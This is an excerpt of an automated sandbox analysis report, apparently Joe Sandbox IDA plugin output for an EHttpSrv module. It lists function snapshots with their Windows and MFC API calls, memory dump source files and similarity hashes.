                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Add
                                                                                                                • API String ID: 310444273-2139371048
                                                                                                                • Opcode ID: 059ce8af9f42aabfe0cd5e377f5a41b3970c0beea28853d1bbe08e662d45d612
                                                                                                                • Instruction ID: 61125b7eef0a31584287f038c8e0a1b67b7715f4f3ef1c4395f14a17ca5db06c
                                                                                                                • Opcode Fuzzy Hash: 059ce8af9f42aabfe0cd5e377f5a41b3970c0beea28853d1bbe08e662d45d612
                                                                                                                • Instruction Fuzzy Hash: CDF07475605B019FC720CFA9C988B07B7E4AB0CA25F10DD6DA49AC3A25D738E584DF04
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?), ref: 20435AB3
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435AC4
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 20435ADE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_GetImageInfo
                                                                                                                • API String ID: 310444273-158344479
                                                                                                                • Opcode ID: c024165aa123b689d06b6dbdf8e77b7d6a87fe6dc0445346d27547bcca64b791
                                                                                                                • Instruction ID: e0c6696969016ec1769552a578c8248ca279875db4b0b8f7fac6fa2bfb55e8b3
                                                                                                                • Opcode Fuzzy Hash: c024165aa123b689d06b6dbdf8e77b7d6a87fe6dc0445346d27547bcca64b791
                                                                                                                • Instruction Fuzzy Hash: AAF0D470A04B01DFD720DFB8C888B02B7E4AB08A25F10D82DA4AAC3651DB38E440DF10
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,204272C9), ref: 20427360
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20427371
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_SetBkColor), ref: 2042738B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_SetBkColor
                                                                                                                • API String ID: 310444273-1554945321
                                                                                                                • Opcode ID: e8d77fa53df3f7ee09eaa64477699b8d18d36c9305cf34044fe3b494192e285d
                                                                                                                • Instruction ID: 284c7b030e246ad0862ef96458f4fdec8fd086ceb7392f24da5df9d6a012c85e
                                                                                                                • Opcode Fuzzy Hash: e8d77fa53df3f7ee09eaa64477699b8d18d36c9305cf34044fe3b494192e285d
                                                                                                                • Instruction Fuzzy Hash: E3F07475605B01DFD760CFA8D988B07B7E4BB08A19B00D82DE89AC3A11D738E940DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,204352D9,?,?,FEEA6C22), ref: 20435370
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20435381
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 2043539B
                                                                                                                Strings
                                                                                                                • ImageList_GetImageCount, xrefs: 20435395
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_GetImageCount
                                                                                                                • API String ID: 310444273-4246500564
                                                                                                                • Opcode ID: d8097c728569e3866e52bdd65f396c4fad9623ee8d0876328ff2cbbc020671d3
                                                                                                                • Instruction ID: 2da6b41783d0211aef1b011f4005f966f4402148aba3db6cb9b097729d0c8202
                                                                                                                • Opcode Fuzzy Hash: d8097c728569e3866e52bdd65f396c4fad9623ee8d0876328ff2cbbc020671d3
                                                                                                                • Instruction Fuzzy Hash: F2F06275605B019FC760CFA8C988B06B7E4BF08A55B10DD2DA4DAC7A11E778E540DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,20435436,?), ref: 204354D0
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 204354E1
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_ReplaceIcon), ref: 204354FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_ReplaceIcon
                                                                                                                • API String ID: 310444273-3264144174
                                                                                                                • Opcode ID: 74c869a9a8c2336e005997e81289362f39642b772dcdaed8b0994d0f4db7fbd2
                                                                                                                • Instruction ID: 3e15f9a9b1d919c9fe31402087bf8c7712b9f134e2685c61a9ad19c662dd77c6
                                                                                                                • Opcode Fuzzy Hash: 74c869a9a8c2336e005997e81289362f39642b772dcdaed8b0994d0f4db7fbd2
                                                                                                                • Instruction Fuzzy Hash: 5FF07475605B01DFC720CFA9C988B06B7E4AB1CA16B10D92DE49AC3A51D738F980DF04
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?), ref: 20438D90
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 20438DA1
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Remove), ref: 20438DBB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Remove
                                                                                                                • API String ID: 310444273-1758120396
                                                                                                                • Opcode ID: 079ee940bcfe234ec36ffd8b644cc9a63304a968f59cf3a307cb535ea809afee
                                                                                                                • Instruction ID: 16fb2f48fd19f0c7492424fa88f2029c9d2318f9a38d168fc86bc1dfa45b5a4d
                                                                                                                • Opcode Fuzzy Hash: 079ee940bcfe234ec36ffd8b644cc9a63304a968f59cf3a307cb535ea809afee
                                                                                                                • Instruction Fuzzy Hash: 3BF07475605B019FC760CFB8C988B02B7E4BB58A19B10DC2DE09AC3B91D778E580DB00
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(?,20438E89,?,00000000,FEEA6C22,00000000,00000000,?,?,00000001,?,00000000,00000000,?), ref: 20438F30
                                                                                                                • LoadLibraryW.KERNEL32(?,?,00000001,?,00000000,00000000,?), ref: 20438F41
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_Draw), ref: 20438F5B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_Draw
                                                                                                                • API String ID: 310444273-2074868843
                                                                                                                • Opcode ID: 5d39e66da341277afc1545f6a1c92b557577de52ee8df2f5711e62b8d41952b8
                                                                                                                • Instruction ID: 8b8081af3f1095d29bb6d133c22ff23e0a3673458e9ea1b94d5029bc85ce2e59
                                                                                                                • Opcode Fuzzy Hash: 5d39e66da341277afc1545f6a1c92b557577de52ee8df2f5711e62b8d41952b8
                                                                                                                • Instruction Fuzzy Hash: D4F06275605B019FD760DFA9D988B02B7E5BB08A15B10DD2DA49AC3A11D778F540DF00
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000), ref: 2044EEF2
                                                                                                                • EnterCriticalSection.KERNEL32(-00003AFC), ref: 2044EF14
                                                                                                                  • Part of subcall function 2044F870: EnterCriticalSection.KERNEL32(-00003A6C), ref: 2044F886
                                                                                                                  • Part of subcall function 2044F870: LeaveCriticalSection.KERNEL32(-00003A6C,?), ref: 2044F89C
                                                                                                                  • Part of subcall function 2040E8B0: _wcsicmp.MSVCR80 ref: 2040E8F6
                                                                                                                • _time32.MSVCR80 ref: 2044F19D
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044F241
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$#314#6751Leave_time32_wcsicmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 572526790-0
                                                                                                                • Opcode ID: ed03fb45f41e36c0d5e5fc2ddcd8a74d31b367c40610b0e286b421728a2960dc
                                                                                                                • Instruction ID: a41998383fe25ffac22fc7ccb07849e4817f59a96ff63d102d77dae527154431
                                                                                                                • Opcode Fuzzy Hash: ed03fb45f41e36c0d5e5fc2ddcd8a74d31b367c40610b0e286b421728a2960dc
                                                                                                                • Instruction Fuzzy Hash: 9CB19E31A04641DBE705CFA5C980B56B7A6BB84308F54C7BDE9484B787CB39AE46CB81
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044B6C3
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044B743
                                                                                                                • #1176.MFC80U(?), ref: 2044B80F
                                                                                                                • #6751.MFC80U(00000000,?,?), ref: 2044B930
                                                                                                                  • Part of subcall function 2042D0B0: IsWindow.USER32(?), ref: 2042D0E9
                                                                                                                  • Part of subcall function 2042D0B0: PostMessageW.USER32(?,00000445,010300D4), ref: 2042D102
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#1176#314MessagePostWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3217281582-0
                                                                                                                • Opcode ID: 5fa345bc5857240e9f86b57c889d0dfae663a8f57130abd31cf7eab99548e548
                                                                                                                • Instruction ID: b28df402dce2b7cef7e71af0391a6853a6e5c8744560c8c3959885f1aa1c6a3a
                                                                                                                • Opcode Fuzzy Hash: 5fa345bc5857240e9f86b57c889d0dfae663a8f57130abd31cf7eab99548e548
                                                                                                                • Instruction Fuzzy Hash: 4F814574A087419FE314DF64C441B5ABBF4BF84318F10CA2DE599873A1DB78E945CB92
                                                                                                                APIs
                                                                                                                • #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20410F83
                                                                                                                • #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20410FE3
                                                                                                                • #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 20411043
                                                                                                                • #265.MFC80U(00000000,00000000,00000000,?,20412895,?), ref: 204110A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #265
                                                                                                                • String ID:
                                                                                                                • API String ID: 1803795300-0
                                                                                                                • Opcode ID: 9b3e34e20514793be14f5fc2f0b18d951115683c20f85ad0fc61bec4e7d5a730
                                                                                                                • Instruction ID: 9403ae3a06e9507dc1ff99d48ab7f3c065b4733f5c841587fd49247d63e3c639
                                                                                                                • Opcode Fuzzy Hash: 9b3e34e20514793be14f5fc2f0b18d951115683c20f85ad0fc61bec4e7d5a730
                                                                                                                • Instruction Fuzzy Hash: 295190366002018BCB18CF64C8527AB77A2EF88754F59C66CDD069F795E679FE42C780
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmpfreememcpyreallocwcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 29784309-0
                                                                                                                • Opcode ID: 2ca4960e8b7845ac15a85c0466c447a55554a0e6fb247eef4d323213e34a1664
                                                                                                                • Instruction ID: feb4e5f844788c8695473aa1f2191a6a043e49db64690f2c89d34fc1cc0b7b57
                                                                                                                • Opcode Fuzzy Hash: 2ca4960e8b7845ac15a85c0466c447a55554a0e6fb247eef4d323213e34a1664
                                                                                                                • Instruction Fuzzy Hash: 1D31B6B2908700ABD304DF64DE81A3BB3E9EB94615F158A3DFC45D3380E639DD0586A2
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044F70F
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 2044F795
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 2044F7B6
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044F84A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$#314#6751EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 43741055-0
                                                                                                                • Opcode ID: 81f2132f0f5e54a88fdd4fa29ecbc24753f534aa3ac267aedb014eeb049dfa1d
                                                                                                                • Instruction ID: 2a341d5d441c251ca3bdd549d2104671dc06891eb54429a817a1eb2414ec20f1
                                                                                                                • Opcode Fuzzy Hash: 81f2132f0f5e54a88fdd4fa29ecbc24753f534aa3ac267aedb014eeb049dfa1d
                                                                                                                • Instruction Fuzzy Hash: 4341F271A047058FEB10DFA4C880B9677A5EF94B18F04CB7DE9589F291DB39E904CB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20420040: #764.MFC80U(?,?,?,20462BF8,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 20420074
                                                                                                                  • Part of subcall function 2041B640: #764.MFC80U(?,?,?,20462C00,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000), ref: 2041B674
                                                                                                                  • Part of subcall function 20412B10: #1176.MFC80U(FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89), ref: 20412B3D
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B64
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B74
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B84
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412B94
                                                                                                                  • Part of subcall function 20412B10: #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,2047CFDF,000000FF,20462C0A,00000000,FEEA6C22,?,?,?,00000000,00000000), ref: 20412BAD
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3AF
                                                                                                                  • Part of subcall function 2040F390: #764.MFC80U(?,00000000,?,20462C12,00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?), ref: 2040F3C7
                                                                                                                • #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                • #578.MFC80U ref: 20462C6E
                                                                                                                • #2461.MFC80U(00030003), ref: 20462CD7
                                                                                                                • #578.MFC80U ref: 20462D35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764$#2461#578$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 3417459804-0
                                                                                                                • Opcode ID: 371db3f090722565ab10a011f626aeafc9584fdcccf669e087e96a213066d7ca
                                                                                                                • Instruction ID: c2a683849d6fb96d4b3e35d838ed9aec9a96d629bdbd65cf109ae4fc9048b901
                                                                                                                • Opcode Fuzzy Hash: 371db3f090722565ab10a011f626aeafc9584fdcccf669e087e96a213066d7ca
                                                                                                                • Instruction Fuzzy Hash: B0412331608A00AFD304CBA0C94139E7BD4AB64B58F04CA3DFC45A7391DB3DDA4ACB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#314#762
                                                                                                                • String ID:
                                                                                                                • API String ID: 18822990-0
                                                                                                                • Opcode ID: 14400c33ff8118e7106871d96b4d195cf140b650c29abdceeccd6af731c5f2cb
                                                                                                                • Instruction ID: 680145d2944819133483d1aa39b31a240541b6f6ac57da04c80a782cee897e91
                                                                                                                • Opcode Fuzzy Hash: 14400c33ff8118e7106871d96b4d195cf140b650c29abdceeccd6af731c5f2cb
                                                                                                                • Instruction Fuzzy Hash: 80316D71A087419FD310DFA8C841B6BBBE4FB94A64F108A1DF95487790DB79E805CB92
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,?,?,00000000,76945540,?,20420AC2,?), ref: 20421954
                                                                                                                • #764.MFC80U(?,?,?,00000000,76945540,?,20420AC2,?), ref: 2042196D
                                                                                                                • #764.MFC80U(00000000,00000000,?,?,00000000,76945540,?,20420AC2,?), ref: 204219D5
                                                                                                                • #1176.MFC80U(?,?,00000000,76945540,?,20420AC2,?), ref: 204219E5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
